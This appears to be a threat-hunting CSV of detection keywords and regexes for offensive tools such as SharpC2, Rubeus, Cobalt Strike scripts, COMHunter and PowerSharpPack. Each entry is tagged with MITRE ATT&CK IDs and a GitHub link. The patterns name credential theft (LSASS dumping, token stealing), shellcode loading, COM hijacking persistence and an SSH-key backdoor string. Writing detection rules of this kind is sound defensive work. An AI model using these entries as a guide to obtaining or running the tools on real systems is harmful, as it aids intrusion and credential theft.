"*CognisysGroup/HadesLdr*",".{0,1000}CognisysGroup\/HadesLdr.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*coinomi2john.py*",".{0,1000}coinomi2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*coldfusion_dir_traversal_exploit*",".{0,1000}coldfusion_dir_traversal_exploit.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*Collect security tokens from pipe server (\\\\.\\pipe\\catcher)*",".{0,1000}Collect\ssecurity\stokens\sfrom\spipe\sserver\s\(\\\\\\\\\.\\\\pipe\\\\catcher\).{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Collection/MiniDumpWriteDump.*",".{0,1000}Collection\/MiniDumpWriteDump\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Collection_ArchiveCollectedData_ArchiveViaCustomMethod.py*",".{0,1000}Collection_ArchiveCollectedData_ArchiveViaCustomMethod\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Collection_ArchiveCollectedData_ArchiveViaCustomMethod_7z.py*",".{0,1000}Collection_ArchiveCollectedData_ArchiveViaCustomMethod_7z\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*--collectionmethod DCOnly*",".{0,1000}\-\-collectionmethod\sDCOnly.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*COM Object hijacking persistence.ps1*",".{0,1000}COM\sObject\shijacking\spersistence\.ps1.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","1","N/A","8","1","55","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z" "*com.itgorillaz.lnk2pwn.model*",".{0,1000}com\.itgorillaz\.lnk2pwn\.model.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*com.rastamouse.*",".{0,1000}com\.rastamouse\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*com_exec_go(*",".{0,1000}com_exec_go\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","0","N/A","10","10","306","84","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" "*combine_harvester-main*",".{0,1000}combine_harvester\-main.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","10","2","106","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*com-exec.cna*",".{0,1000}com\-exec\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","306","84","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" "*COMHunter* -inproc*",".{0,1000}COMHunter.{0,1000}\s\-inproc.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*COMHunter* -localserver*",".{0,1000}COMHunter.{0,1000}\s\-localserver.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*COMHunter.csproj*",".{0,1000}COMHunter\.csproj.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*COMHunter.exe*",".{0,1000}COMHunter\.exe.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*COMHunter.sln*",".{0,1000}COMHunter\.sln.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*COM-Hunter_v*.zip*",".{0,1000}COM\-Hunter_v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "*COM-Hunter-main*",".{0,1000}COM\-Hunter\-main.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "*COMInjectDotNet.exe*",".{0,1000}COMInjectDotNet\.exe.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*-Command ""--signature --driver""*",".{0,1000}\-Command\s\""\-\-signature\s\-\-driver\"".{0,1000}","offensive_tool_keyword","PowerSharpPack","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*-command *.exe* -technique ccmstp*",".{0,1000}\-command\s.{0,1000}\.exe.{0,1000}\s\-technique\sccmstp.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*command_obfuscator.py*",".{0,1000}command_obfuscator\.py.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1504","175","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "*command=*###---POWERSHELL---*eval $(echo *",".{0,1000}command\=.{0,1000}\#\#\#\-\-\-POWERSHELL\-\-\-.{0,1000}eval\s\$\(echo\s.{0,1000}","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A" "*CommandAndControl_*.py*",".{0,1000}CommandAndControl_.{0,1000}\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*CommandCam.exe /devlist > *\CC.log*",".{0,1000}CommandCam\.exe\s\/devlist\s\>\s.{0,1000}\\CC\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*CommandCam.exe*",".{0,1000}CommandCam\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*commandovm.*.installer.fireeye*",".{0,1000}commandovm\..{0,1000}\.installer\.fireeye.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*commando-vm-master*",".{0,1000}commando\-vm\-master.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*Commands/Brute.*",".{0,1000}Commands\/Brute\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Commands/Createnetonly.*",".{0,1000}Commands\/Createnetonly\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Commands/DcomCommand.*",".{0,1000}Commands\/DcomCommand\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/DroneCommand.*",".{0,1000}Commands\/DroneCommand\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/ExecuteAssembly.*",".{0,1000}Commands\/ExecuteAssembly\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/KillProcess.*",".{0,1000}Commands\/KillProcess\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/ListProcesses.*",".{0,1000}Commands\/ListProcesses\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/Logonsession.*",".{0,1000}Commands\/Logonsession\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Commands/PowerShellImport.*",".{0,1000}Commands\/PowerShellImport\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/Preauthscan.*",".{0,1000}Commands\/Preauthscan\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Commands/PrintWorkingDirectory.*",".{0,1000}Commands\/PrintWorkingDirectory\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/PsExecCommand.*",".{0,1000}Commands\/PsExecCommand\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/RevToSelf.*",".{0,1000}Commands\/RevToSelf\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/RunPe.*",".{0,1000}Commands\/RunPe\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/SetSleep.*",".{0,1000}Commands\/SetSleep\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/Shell.*",".{0,1000}Commands\/Shell\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/ShInject.*",".{0,1000}Commands\/ShInject\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/ShSpawn.*",".{0,1000}Commands\/ShSpawn\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/Silver.*",".{0,1000}Commands\/Silver\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Commands/StealToken.*",".{0,1000}Commands\/StealToken\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/StopDrone.*",".{0,1000}Commands\/StopDrone\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/TakeScreenshot.*",".{0,1000}Commands\/TakeScreenshot\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/WhoAmI.*",".{0,1000}Commands\/WhoAmI\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/WinRmCommand.*",".{0,1000}Commands\/WinRmCommand\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/WmiCommand.*",".{0,1000}Commands\/WmiCommand\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*commixproject/commix*",".{0,1000}commixproject\/commix.{0,1000}","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4340","797","2024-04-29T06:05:52Z","2015-03-20T08:38:26Z" "*common.ReflectiveDLL*",".{0,1000}common\.ReflectiveDLL.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" 